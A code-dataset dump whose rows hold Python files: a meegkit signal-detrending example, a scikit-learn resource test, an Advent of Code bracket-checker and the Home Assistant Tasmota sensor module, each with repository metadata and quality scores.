plt.plot(y, ls=':', label='fit', color='C1')
plt.title('Channel-wise regression')
plt.legend()
###############################################################################
# Detrending
# =============================================================================
###############################################################################
# Basic example with a linear trend
# -----------------------------------------------------------------------------
x = np.arange(100)[:, None]
x = x + np.random.randn(*x.shape)
y, _, _ = detrend(x, 1)
plt.figure(5)
plt.plot(x, label='original')
plt.plot(y, label='detrended')
plt.legend()
###############################################################################
# Detrend biased random walk with a third-order polynomial
# -----------------------------------------------------------------------------
x = np.cumsum(np.random.randn(1000, 1) + 0.1)
y, _, _ = detrend(x, 3)
plt.figure(6)
plt.plot(x, label='original')
plt.plot(y, label='detrended')
plt.legend()
###############################################################################
# Detrend with weights
# -----------------------------------------------------------------------------
# Finally, we show how the detrending process handles local artifacts, and how
# we can advantageously use weights to improve detrending. The raw data
# consists of gaussian noise with a linear trend, and a storng glitch covering
# the first 100 timesamples (blue trace). Detrending without weights (orange
# trace) causes an overestimation of the polynomial order because of the
# glitch, leading to a mediocre fit. When downweightining this artifactual
# period, the fit is much improved (green trace).
x = np.linspace(0, 100, 1000)[:, None]
x = x + 3 * np.random.randn(*x.shape)
# introduce some strong artifact on the first 100 samples
x[:100, :] = 100
# Detrend
y, _, _ = detrend(x, 3, None, threshold=np.inf)
# Same process but this time downweight artifactual window
w = np.ones(x.shape)
w[:100, :] = 0
z, _, _ = detrend(x, 3, w)
plt.figure(7)
plt.plot(x, label='original')
plt.plot(y, label='detrended - no weights')
plt.plot(z, label='detrended - weights')
plt.legend()
plt.show()
| """
Robust detrending examples
==========================
Some toy examples to showcase usage for ``meegkit.detrend`` module.
Robust referencing is adapted from [1].
References
----------
> [1] <NAME>., & <NAME>. (2018). Robust detrending,
rereferencing, outlier detection, and inpainting for multichannel data.
NeuroImage, 172, 903-912.
"""
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.gridspec import GridSpec
from meegkit.detrend import regress, detrend
# import config # plotting utils
np.random.seed(9)
###############################################################################
# Regression
# =============================================================================
###############################################################################
# Simple regression example, no weights
# -----------------------------------------------------------------------------
# We first try to fit a simple random walk process.
x = np.cumsum(np.random.randn(1000, 1), axis=0)
r = np.arange(1000.)[:, None]
r = np.hstack([r, r ** 2, r ** 3])
b, y = regress(x, r)
plt.figure(1)
plt.plot(x, label='data')
plt.plot(y, label='fit')
plt.title('No weights')
plt.legend()
plt.show()
###############################################################################
# Downweight 1st half of the data
# -----------------------------------------------------------------------------
# We can also use weights for each time sample. Here we explicitly restrict the
# fit to the second half of the data by setting weights to zero for the first
# 500 samples.
x = np.cumsum(np.random.randn(1000, 1), axis=0) + 1000
w = np.ones(y.shape[0])
w[:500] = 0
b, y = regress(x, r, w)
f = plt.figure(3)
gs = GridSpec(4, 1, figure=f)
ax1 = f.add_subplot(gs[:3, 0])
ax1.plot(x, label='data')
ax1.plot(y, label='fit')
ax1.set_xticklabels('')
ax1.set_title('Split-wise regression')
ax1.legend()
ax2 = f.add_subplot(gs[3, 0])
l, = ax2.plot(np.arange(1000), np.zeros(1000))
ax2.stackplot(np.arange(1000), w, labels=['weights'], color=l.get_color())
ax2.legend(loc=2)
###############################################################################
# Multichannel regression
# -----------------------------------------------------------------------------
x = np.cumsum(np.random.randn(1000, 2), axis=0)
w = np.ones(y.shape[0])
b, y = regress(x, r, w)
plt.figure(4)
plt.plot(x, label='data', color='C0')
plt.plot(y, ls=':', label='fit', color='C1')
plt.title('Channel-wise regression')
plt.legend()
###############################################################################
# Detrending
# =============================================================================
###############################################################################
# Basic example with a linear trend
# -----------------------------------------------------------------------------
x = np.arange(100)[:, None]
x = x + np.random.randn(*x.shape)
y, _, _ = detrend(x, 1)
plt.figure(5)
plt.plot(x, label='original')
plt.plot(y, label='detrended')
plt.legend()
###############################################################################
# Detrend biased random walk with a third-order polynomial
# -----------------------------------------------------------------------------
x = np.cumsum(np.random.randn(1000, 1) + 0.1)
y, _, _ = detrend(x, 3)
plt.figure(6)
plt.plot(x, label='original')
plt.plot(y, label='detrended')
plt.legend()
###############################################################################
# Detrend with weights
# -----------------------------------------------------------------------------
# Finally, we show how the detrending process handles local artifacts, and how
# we can advantageously use weights to improve detrending. The raw data
# consists of gaussian noise with a linear trend, and a storng glitch covering
# the first 100 timesamples (blue trace). Detrending without weights (orange
# trace) causes an overestimation of the polynomial order because of the
# glitch, leading to a mediocre fit. When downweightining this artifactual
# period, the fit is much improved (green trace).
x = np.linspace(0, 100, 1000)[:, None]
x = x + 3 * np.random.randn(*x.shape)
# introduce some strong artifact on the first 100 samples
x[:100, :] = 100
# Detrend
y, _, _ = detrend(x, 3, None, threshold=np.inf)
# Same process but this time downweight artifactual window
w = np.ones(x.shape)
w[:100, :] = 0
z, _, _ = detrend(x, 3, w)
plt.figure(7)
plt.plot(x, label='original')
plt.plot(y, label='detrended - no weights')
plt.plot(z, label='detrended - weights')
plt.legend()
plt.show()
| en | 0.397905 | Robust detrending examples ========================== Some toy examples to showcase usage for ``meegkit.detrend`` module. Robust referencing is adapted from [1]. References ---------- > [1] <NAME>., & <NAME>. (2018). Robust detrending, rereferencing, outlier detection, and inpainting for multichannel data. NeuroImage, 172, 903-912. # import config # plotting utils ############################################################################### # Regression # ============================================================================= ############################################################################### # Simple regression example, no weights # ----------------------------------------------------------------------------- # We first try to fit a simple random walk process. ############################################################################### # Downweight 1st half of the data # ----------------------------------------------------------------------------- # We can also use weights for each time sample. Here we explicitly restrict the # fit to the second half of the data by setting weights to zero for the first # 500 samples. ############################################################################### # Multichannel regression # ----------------------------------------------------------------------------- ############################################################################### # Detrending # ============================================================================= ############################################################################### # Basic example with a linear trend # ----------------------------------------------------------------------------- ############################################################################### # Detrend biased random walk with a third-order polynomial # ----------------------------------------------------------------------------- ############################################################################### # Detrend with weights # ----------------------------------------------------------------------------- # Finally, we show how the detrending process handles local artifacts, and how # we can advantageously use weights to improve detrending. The raw data # consists of gaussian noise with a linear trend, and a storng glitch covering # the first 100 timesamples (blue trace). Detrending without weights (orange # trace) causes an overestimation of the polynomial order because of the # glitch, leading to a mediocre fit. When downweightining this artifactual # period, the fit is much improved (green trace). # introduce some strong artifact on the first 100 samples # Detrend # Same process but this time downweight artifactual window | 2.426304 | 2 |
publications/2022TPAMI/experiment-controller/python/singularity/resourcetest.py | fmohr/llcv | 3 | 6632519 | import json
import ConfigSpace
from ConfigSpace.util import *
from ConfigSpace.read_and_write import json as config_json
import random
from commons import *
import numpy as np
import matplotlib.pyplot as plt
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import RobustScaler
from sklearn.decomposition import FastICA
from sklearn.neural_network import MLPClassifier
import os
print(os.environ["OMP_NUM_THREADS"])
print(os.environ["MKL_NUM_THREADS"])
print(os.environ["OPENBLAS_NUM_THREADS"])
print(os.environ["BLIS_NUM_THREADS"])
#X, y = get_dataset(1485)
X, y = get_dataset(1485)
y = y.to_numpy()
for i in range(6):
print(X.shape)
print(y.shape)
X = np.row_stack([X, X])
y = np.row_stack([y.reshape(len(y), 1), y.reshape(len(y), 1)])
print(X.shape, y.shape)
pl = Pipeline(steps=[('predictor', MLPClassifier())])
pl.fit(X, y) | import json
import ConfigSpace
from ConfigSpace.util import *
from ConfigSpace.read_and_write import json as config_json
import random
from commons import *
import numpy as np
import matplotlib.pyplot as plt
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import RobustScaler
from sklearn.decomposition import FastICA
from sklearn.neural_network import MLPClassifier
import os
print(os.environ["OMP_NUM_THREADS"])
print(os.environ["MKL_NUM_THREADS"])
print(os.environ["OPENBLAS_NUM_THREADS"])
print(os.environ["BLIS_NUM_THREADS"])
#X, y = get_dataset(1485)
X, y = get_dataset(1485)
y = y.to_numpy()
for i in range(6):
print(X.shape)
print(y.shape)
X = np.row_stack([X, X])
y = np.row_stack([y.reshape(len(y), 1), y.reshape(len(y), 1)])
print(X.shape, y.shape)
pl = Pipeline(steps=[('predictor', MLPClassifier())])
pl.fit(X, y) | es | 0.25872 | #X, y = get_dataset(1485) | 2.179228 | 2 |
d10/part1.py | Jamie-Chang/advent2021 | 0 | 6632520 | <filename>d10/part1.py
from typing import Final, Iterable, Iterator
CLOSER: Final[dict[str, str]] = {
"{": "}",
"(": ")",
"<": ">",
"[": "]",
}
SCORES: Final[dict[str, int]] = {
")": 3,
"]": 57,
"}": 1197,
">": 25137,
}
def read() -> Iterator[str]:
with open("d10/input.txt") as f:
for line in f:
yield line.strip()
def check(line: str) -> str | None:
"""
>>> check("()")
>>> check("(]")
']'
>>> check("(")
>>> check("]")
']'
"""
stack = []
for c in line:
match c, stack:
case ("{", _) | ("(", _) | ("<", _) | ("[", _):
stack.append(c)
case c, []:
return c
case c, [*_, opener] if c != CLOSER[opener]:
return c
case c, [*_, opener] if c == CLOSER[opener]:
stack.pop()
return None
def get_scores(lines: Iterable[str]) -> Iterator[int]:
for line in lines:
character = check(line)
if character is None:
continue
yield SCORES[character]
if __name__ == "__main__":
print(sum(get_scores(read())))
| <filename>d10/part1.py
from typing import Final, Iterable, Iterator
CLOSER: Final[dict[str, str]] = {
"{": "}",
"(": ")",
"<": ">",
"[": "]",
}
SCORES: Final[dict[str, int]] = {
")": 3,
"]": 57,
"}": 1197,
">": 25137,
}
def read() -> Iterator[str]:
with open("d10/input.txt") as f:
for line in f:
yield line.strip()
def check(line: str) -> str | None:
"""
>>> check("()")
>>> check("(]")
']'
>>> check("(")
>>> check("]")
']'
"""
stack = []
for c in line:
match c, stack:
case ("{", _) | ("(", _) | ("<", _) | ("[", _):
stack.append(c)
case c, []:
return c
case c, [*_, opener] if c != CLOSER[opener]:
return c
case c, [*_, opener] if c == CLOSER[opener]:
stack.pop()
return None
def get_scores(lines: Iterable[str]) -> Iterator[int]:
for line in lines:
character = check(line)
if character is None:
continue
yield SCORES[character]
if __name__ == "__main__":
print(sum(get_scores(read())))
| zh | 0.262515 | >>> check("()") >>> check("(]") ']' >>> check("(") >>> check("]") ']' | 3.51315 | 4 |
homeassistant/components/tasmota/sensor.py | MrDelik/core | 22,481 | 6632521 | """Support for Tasmota sensors."""
from __future__ import annotations
from datetime import datetime
from typing import Any
from hatasmota import const as hc, sensor as tasmota_sensor, status_sensor
from hatasmota.entity import TasmotaEntity as HATasmotaEntity
from hatasmota.models import DiscoveryHashType
from homeassistant.components import sensor
from homeassistant.components.sensor import (
SensorDeviceClass,
SensorEntity,
SensorStateClass,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
ELECTRIC_CURRENT_AMPERE,
ELECTRIC_POTENTIAL_VOLT,
ENERGY_KILO_WATT_HOUR,
FREQUENCY_HERTZ,
LENGTH_CENTIMETERS,
LIGHT_LUX,
MASS_KILOGRAMS,
PERCENTAGE,
POWER_VOLT_AMPERE,
POWER_WATT,
PRESSURE_HPA,
SIGNAL_STRENGTH_DECIBELS,
SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
SPEED_KILOMETERS_PER_HOUR,
SPEED_METERS_PER_SECOND,
SPEED_MILES_PER_HOUR,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
TEMP_KELVIN,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import EntityCategory
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import DATA_REMOVE_DISCOVER_COMPONENT
from .discovery import TASMOTA_DISCOVERY_ENTITY_NEW
from .mixins import TasmotaAvailability, TasmotaDiscoveryUpdate
DEVICE_CLASS = "device_class"
STATE_CLASS = "state_class"
ICON = "icon"
# A Tasmota sensor type may be mapped to either a device class or an icon, not both
SENSOR_DEVICE_CLASS_ICON_MAP: dict[str, dict[str, Any]] = {
hc.SENSOR_AMBIENT: {
DEVICE_CLASS: SensorDeviceClass.ILLUMINANCE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_APPARENT_POWERUSAGE: {
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_BATTERY: {
DEVICE_CLASS: SensorDeviceClass.BATTERY,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_CCT: {
ICON: "mdi:temperature-kelvin",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_CO2: {
DEVICE_CLASS: SensorDeviceClass.CO2,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_COLOR_BLUE: {ICON: "mdi:palette"},
hc.SENSOR_COLOR_GREEN: {ICON: "mdi:palette"},
hc.SENSOR_COLOR_RED: {ICON: "mdi:palette"},
hc.SENSOR_CURRENT: {
ICON: "mdi:alpha-a-circle-outline",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_DEWPOINT: {
DEVICE_CLASS: SensorDeviceClass.TEMPERATURE,
ICON: "mdi:weather-rainy",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_DISTANCE: {
ICON: "mdi:leak",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_ECO2: {ICON: "mdi:molecule-co2"},
hc.SENSOR_FREQUENCY: {
DEVICE_CLASS: SensorDeviceClass.FREQUENCY,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_HUMIDITY: {
DEVICE_CLASS: SensorDeviceClass.HUMIDITY,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_ILLUMINANCE: {
DEVICE_CLASS: SensorDeviceClass.ILLUMINANCE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_IP: {ICON: "mdi:ip-network"},
hc.SENSOR_STATUS_LINK_COUNT: {ICON: "mdi:counter"},
hc.SENSOR_MOISTURE: {ICON: "mdi:cup-water"},
hc.SENSOR_STATUS_MQTT_COUNT: {ICON: "mdi:counter"},
hc.SENSOR_PB0_3: {ICON: "mdi:flask"},
hc.SENSOR_PB0_5: {ICON: "mdi:flask"},
hc.SENSOR_PB10: {ICON: "mdi:flask"},
hc.SENSOR_PB1: {ICON: "mdi:flask"},
hc.SENSOR_PB2_5: {ICON: "mdi:flask"},
hc.SENSOR_PB5: {ICON: "mdi:flask"},
hc.SENSOR_PM10: {
DEVICE_CLASS: SensorDeviceClass.PM10,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PM1: {
DEVICE_CLASS: SensorDeviceClass.PM1,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PM2_5: {
DEVICE_CLASS: SensorDeviceClass.PM25,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_POWERFACTOR: {
ICON: "mdi:alpha-f-circle-outline",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_POWERUSAGE: {
DEVICE_CLASS: SensorDeviceClass.POWER,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PRESSURE: {
DEVICE_CLASS: SensorDeviceClass.PRESSURE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PRESSUREATSEALEVEL: {
DEVICE_CLASS: SensorDeviceClass.PRESSURE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PROXIMITY: {ICON: "mdi:ruler"},
hc.SENSOR_REACTIVE_POWERUSAGE: {
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_LAST_RESTART_TIME: {DEVICE_CLASS: SensorDeviceClass.TIMESTAMP},
hc.SENSOR_STATUS_RESTART_REASON: {ICON: "mdi:information-outline"},
hc.SENSOR_STATUS_SIGNAL: {
DEVICE_CLASS: SensorDeviceClass.SIGNAL_STRENGTH,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_RSSI: {
ICON: "mdi:access-point",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_SSID: {ICON: "mdi:access-point-network"},
hc.SENSOR_TEMPERATURE: {
DEVICE_CLASS: SensorDeviceClass.TEMPERATURE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_TODAY: {DEVICE_CLASS: SensorDeviceClass.ENERGY},
hc.SENSOR_TOTAL: {
DEVICE_CLASS: SensorDeviceClass.ENERGY,
STATE_CLASS: SensorStateClass.TOTAL_INCREASING,
},
hc.SENSOR_TOTAL_START_TIME: {ICON: "mdi:progress-clock"},
hc.SENSOR_TVOC: {ICON: "mdi:air-filter"},
hc.SENSOR_VOLTAGE: {
ICON: "mdi:alpha-v-circle-outline",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_WEIGHT: {ICON: "mdi:scale", STATE_CLASS: SensorStateClass.MEASUREMENT},
hc.SENSOR_YESTERDAY: {DEVICE_CLASS: SensorDeviceClass.ENERGY},
}
SENSOR_UNIT_MAP = {
hc.CONCENTRATION_MICROGRAMS_PER_CUBIC_METER: CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
hc.CONCENTRATION_PARTS_PER_BILLION: CONCENTRATION_PARTS_PER_BILLION,
hc.CONCENTRATION_PARTS_PER_MILLION: CONCENTRATION_PARTS_PER_MILLION,
hc.ELECTRICAL_CURRENT_AMPERE: ELECTRIC_CURRENT_AMPERE,
hc.ELECTRICAL_VOLT_AMPERE: POWER_VOLT_AMPERE,
hc.ENERGY_KILO_WATT_HOUR: ENERGY_KILO_WATT_HOUR,
hc.FREQUENCY_HERTZ: FREQUENCY_HERTZ,
hc.LENGTH_CENTIMETERS: LENGTH_CENTIMETERS,
hc.LIGHT_LUX: LIGHT_LUX,
hc.MASS_KILOGRAMS: MASS_KILOGRAMS,
hc.PERCENTAGE: PERCENTAGE,
hc.POWER_WATT: POWER_WATT,
hc.PRESSURE_HPA: PRESSURE_HPA,
hc.SIGNAL_STRENGTH_DECIBELS: SIGNAL_STRENGTH_DECIBELS,
hc.SIGNAL_STRENGTH_DECIBELS_MILLIWATT: SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
hc.SPEED_KILOMETERS_PER_HOUR: SPEED_KILOMETERS_PER_HOUR,
hc.SPEED_METERS_PER_SECOND: SPEED_METERS_PER_SECOND,
hc.SPEED_MILES_PER_HOUR: SPEED_MILES_PER_HOUR,
hc.TEMP_CELSIUS: TEMP_CELSIUS,
hc.TEMP_FAHRENHEIT: TEMP_FAHRENHEIT,
hc.TEMP_KELVIN: TEMP_KELVIN,
hc.VOLT: ELECTRIC_POTENTIAL_VOLT,
}
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up Tasmota sensor dynamically through discovery."""
@callback
def async_discover(
tasmota_entity: HATasmotaEntity, discovery_hash: DiscoveryHashType
) -> None:
"""Discover and add a Tasmota sensor."""
async_add_entities(
[
TasmotaSensor(
tasmota_entity=tasmota_entity, discovery_hash=discovery_hash
)
]
)
hass.data[
DATA_REMOVE_DISCOVER_COMPONENT.format(sensor.DOMAIN)
] = async_dispatcher_connect(
hass,
TASMOTA_DISCOVERY_ENTITY_NEW.format(sensor.DOMAIN),
async_discover,
)
class TasmotaSensor(TasmotaAvailability, TasmotaDiscoveryUpdate, SensorEntity):
"""Representation of a Tasmota sensor."""
_tasmota_entity: tasmota_sensor.TasmotaSensor
def __init__(self, **kwds: Any) -> None:
"""Initialize the Tasmota sensor."""
self._state: Any | None = None
self._state_timestamp: datetime | None = None
super().__init__(
**kwds,
)
async def async_added_to_hass(self) -> None:
"""Subscribe to MQTT events."""
self._tasmota_entity.set_on_state_callback(self.sensor_state_updated)
await super().async_added_to_hass()
@callback
def sensor_state_updated(self, state: Any, **kwargs: Any) -> None:
"""Handle state updates."""
if self.device_class == SensorDeviceClass.TIMESTAMP:
self._state_timestamp = state
else:
self._state = state
self.async_write_ha_state()
@property
def device_class(self) -> str | None:
"""Return the device class of the sensor."""
class_or_icon = SENSOR_DEVICE_CLASS_ICON_MAP.get(
self._tasmota_entity.quantity, {}
)
return class_or_icon.get(DEVICE_CLASS)
@property
def state_class(self) -> str | None:
"""Return the state class of the sensor."""
class_or_icon = SENSOR_DEVICE_CLASS_ICON_MAP.get(
self._tasmota_entity.quantity, {}
)
return class_or_icon.get(STATE_CLASS)
@property
def entity_category(self) -> EntityCategory | None:
"""Return the category of the entity, if any."""
if self._tasmota_entity.quantity in status_sensor.SENSORS:
return EntityCategory.DIAGNOSTIC
return None
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
# Hide fast changing status sensors
if self._tasmota_entity.quantity in (
hc.SENSOR_STATUS_IP,
hc.SENSOR_STATUS_RSSI,
hc.SENSOR_STATUS_SIGNAL,
hc.SENSOR_STATUS_VERSION,
):
return False
return True
@property
def icon(self) -> str | None:
"""Return the icon."""
class_or_icon = SENSOR_DEVICE_CLASS_ICON_MAP.get(
self._tasmota_entity.quantity, {}
)
return class_or_icon.get(ICON)
@property
def native_value(self) -> datetime | str | None:
"""Return the state of the entity."""
if self._state_timestamp and self.device_class == SensorDeviceClass.TIMESTAMP:
return self._state_timestamp
return self._state
@property
def force_update(self) -> bool:
"""Force update."""
return True
@property
def native_unit_of_measurement(self) -> str | None:
"""Return the unit this state is expressed in."""
return SENSOR_UNIT_MAP.get(self._tasmota_entity.unit, self._tasmota_entity.unit)
| """Support for Tasmota sensors."""
from __future__ import annotations
from datetime import datetime
from typing import Any
from hatasmota import const as hc, sensor as tasmota_sensor, status_sensor
from hatasmota.entity import TasmotaEntity as HATasmotaEntity
from hatasmota.models import DiscoveryHashType
from homeassistant.components import sensor
from homeassistant.components.sensor import (
SensorDeviceClass,
SensorEntity,
SensorStateClass,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
ELECTRIC_CURRENT_AMPERE,
ELECTRIC_POTENTIAL_VOLT,
ENERGY_KILO_WATT_HOUR,
FREQUENCY_HERTZ,
LENGTH_CENTIMETERS,
LIGHT_LUX,
MASS_KILOGRAMS,
PERCENTAGE,
POWER_VOLT_AMPERE,
POWER_WATT,
PRESSURE_HPA,
SIGNAL_STRENGTH_DECIBELS,
SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
SPEED_KILOMETERS_PER_HOUR,
SPEED_METERS_PER_SECOND,
SPEED_MILES_PER_HOUR,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
TEMP_KELVIN,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import EntityCategory
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import DATA_REMOVE_DISCOVER_COMPONENT
from .discovery import TASMOTA_DISCOVERY_ENTITY_NEW
from .mixins import TasmotaAvailability, TasmotaDiscoveryUpdate
DEVICE_CLASS = "device_class"
STATE_CLASS = "state_class"
ICON = "icon"
# A Tasmota sensor type may be mapped to either a device class or an icon, not both
SENSOR_DEVICE_CLASS_ICON_MAP: dict[str, dict[str, Any]] = {
hc.SENSOR_AMBIENT: {
DEVICE_CLASS: SensorDeviceClass.ILLUMINANCE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_APPARENT_POWERUSAGE: {
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_BATTERY: {
DEVICE_CLASS: SensorDeviceClass.BATTERY,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_CCT: {
ICON: "mdi:temperature-kelvin",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_CO2: {
DEVICE_CLASS: SensorDeviceClass.CO2,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_COLOR_BLUE: {ICON: "mdi:palette"},
hc.SENSOR_COLOR_GREEN: {ICON: "mdi:palette"},
hc.SENSOR_COLOR_RED: {ICON: "mdi:palette"},
hc.SENSOR_CURRENT: {
ICON: "mdi:alpha-a-circle-outline",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_DEWPOINT: {
DEVICE_CLASS: SensorDeviceClass.TEMPERATURE,
ICON: "mdi:weather-rainy",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_DISTANCE: {
ICON: "mdi:leak",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_ECO2: {ICON: "mdi:molecule-co2"},
hc.SENSOR_FREQUENCY: {
DEVICE_CLASS: SensorDeviceClass.FREQUENCY,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_HUMIDITY: {
DEVICE_CLASS: SensorDeviceClass.HUMIDITY,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_ILLUMINANCE: {
DEVICE_CLASS: SensorDeviceClass.ILLUMINANCE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_IP: {ICON: "mdi:ip-network"},
hc.SENSOR_STATUS_LINK_COUNT: {ICON: "mdi:counter"},
hc.SENSOR_MOISTURE: {ICON: "mdi:cup-water"},
hc.SENSOR_STATUS_MQTT_COUNT: {ICON: "mdi:counter"},
hc.SENSOR_PB0_3: {ICON: "mdi:flask"},
hc.SENSOR_PB0_5: {ICON: "mdi:flask"},
hc.SENSOR_PB10: {ICON: "mdi:flask"},
hc.SENSOR_PB1: {ICON: "mdi:flask"},
hc.SENSOR_PB2_5: {ICON: "mdi:flask"},
hc.SENSOR_PB5: {ICON: "mdi:flask"},
hc.SENSOR_PM10: {
DEVICE_CLASS: SensorDeviceClass.PM10,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PM1: {
DEVICE_CLASS: SensorDeviceClass.PM1,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PM2_5: {
DEVICE_CLASS: SensorDeviceClass.PM25,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_POWERFACTOR: {
ICON: "mdi:alpha-f-circle-outline",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_POWERUSAGE: {
DEVICE_CLASS: SensorDeviceClass.POWER,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PRESSURE: {
DEVICE_CLASS: SensorDeviceClass.PRESSURE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PRESSUREATSEALEVEL: {
DEVICE_CLASS: SensorDeviceClass.PRESSURE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PROXIMITY: {ICON: "mdi:ruler"},
hc.SENSOR_REACTIVE_POWERUSAGE: {
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_LAST_RESTART_TIME: {DEVICE_CLASS: SensorDeviceClass.TIMESTAMP},
hc.SENSOR_STATUS_RESTART_REASON: {ICON: "mdi:information-outline"},
hc.SENSOR_STATUS_SIGNAL: {
DEVICE_CLASS: SensorDeviceClass.SIGNAL_STRENGTH,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_RSSI: {
ICON: "mdi:access-point",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_SSID: {ICON: "mdi:access-point-network"},
hc.SENSOR_TEMPERATURE: {
DEVICE_CLASS: SensorDeviceClass.TEMPERATURE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_TODAY: {DEVICE_CLASS: SensorDeviceClass.ENERGY},
hc.SENSOR_TOTAL: {
DEVICE_CLASS: SensorDeviceClass.ENERGY,
STATE_CLASS: SensorStateClass.TOTAL_INCREASING,
},
hc.SENSOR_TOTAL_START_TIME: {ICON: "mdi:progress-clock"},
hc.SENSOR_TVOC: {ICON: "mdi:air-filter"},
hc.SENSOR_VOLTAGE: {
ICON: "mdi:alpha-v-circle-outline",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_WEIGHT: {ICON: "mdi:scale", STATE_CLASS: SensorStateClass.MEASUREMENT},
hc.SENSOR_YESTERDAY: {DEVICE_CLASS: SensorDeviceClass.ENERGY},
}
SENSOR_UNIT_MAP = {
hc.CONCENTRATION_MICROGRAMS_PER_CUBIC_METER: CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
hc.CONCENTRATION_PARTS_PER_BILLION: CONCENTRATION_PARTS_PER_BILLION,
hc.CONCENTRATION_PARTS_PER_MILLION: CONCENTRATION_PARTS_PER_MILLION,
hc.ELECTRICAL_CURRENT_AMPERE: ELECTRIC_CURRENT_AMPERE,
hc.ELECTRICAL_VOLT_AMPERE: POWER_VOLT_AMPERE,
hc.ENERGY_KILO_WATT_HOUR: ENERGY_KILO_WATT_HOUR,
hc.FREQUENCY_HERTZ: FREQUENCY_HERTZ,
hc.LENGTH_CENTIMETERS: LENGTH_CENTIMETERS,
hc.LIGHT_LUX: LIGHT_LUX,
hc.MASS_KILOGRAMS: MASS_KILOGRAMS,
hc.PERCENTAGE: PERCENTAGE,
hc.POWER_WATT: POWER_WATT,
hc.PRESSURE_HPA: PRESSURE_HPA,
hc.SIGNAL_STRENGTH_DECIBELS: SIGNAL_STRENGTH_DECIBELS,
hc.SIGNAL_STRENGTH_DECIBELS_MILLIWATT: SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
hc.SPEED_KILOMETERS_PER_HOUR: SPEED_KILOMETERS_PER_HOUR,
